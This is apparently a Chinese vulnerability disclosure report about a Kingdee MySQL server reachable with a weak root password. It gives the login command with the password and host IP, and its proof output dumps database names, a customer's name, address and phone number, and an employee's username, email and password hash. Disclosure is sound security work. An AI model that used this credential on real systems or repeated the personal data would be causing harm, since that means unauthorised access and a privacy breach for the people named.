金蝶某主机Mysql弱密码泄露部分员工信息

### 简要描述： 金蝶某主机mysql弱密码,泄露部分员工信息。 ### 详细说明： mysql -uroot -p123456 -h218.244.150.94 ### 漏洞证明： mysql> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | aucp | | jiradb | | mysql | | performance_schema | | pss | | scrumdb | | test | +--------------------+ －－－－－－－－－－－－－－－－ id: 1 create_date: 2015-01-29 14:59:53 modify_date: 2015-01-29 14:59:53 address: 株洲市XXXX路XXX号 amount_paid: 0.000000 area_name: consignee: 陈大旺 coupon_discount: 0.000000 expire: NULL fee: 0.000000 freight: 0.000000 invoice_title: NULL is_allocated_stock: is_invoice: lock_expire: NULL memo: NULL offset_amount: 0.000000 order_status: 0 payment_method_name: 货到付款 payment_status: 0 phone: 18601100111 point: 1350 promotion: NULL promotion_discount: 0.000000 shipping_method_name: 普通快递 shipping_status: 0 sn: 20150129606 tax: 0.000000 zip_code: 000000 area: NULL －－－－－－－－－－－－－－－－－－ *************************** 7. row *************************** ID: 10211 directory_id: 1 user_name: xufeng lower_user_name: xufeng active: 1 created_date: 2015-01-27 16:14:13 updated_date: 2015-01-27 16:14:13 first_name: lower_first_name: last_name: 徐凤 lower_last_name: 徐凤 display_name: 徐凤 lower_display_name: 徐凤 email_address: xufeng@apusic.com lower_email_address: xufeng@apusic.com CREDENTIAL: {PKCS5S2}qeIYyiBqjdB9CPQrLhn+uKysIpsdGvY0GXrKO24IYIIYWLckNA7KxliAAdEQvUtz deleted_externally: NULL 7 rows in set (0.01 sec)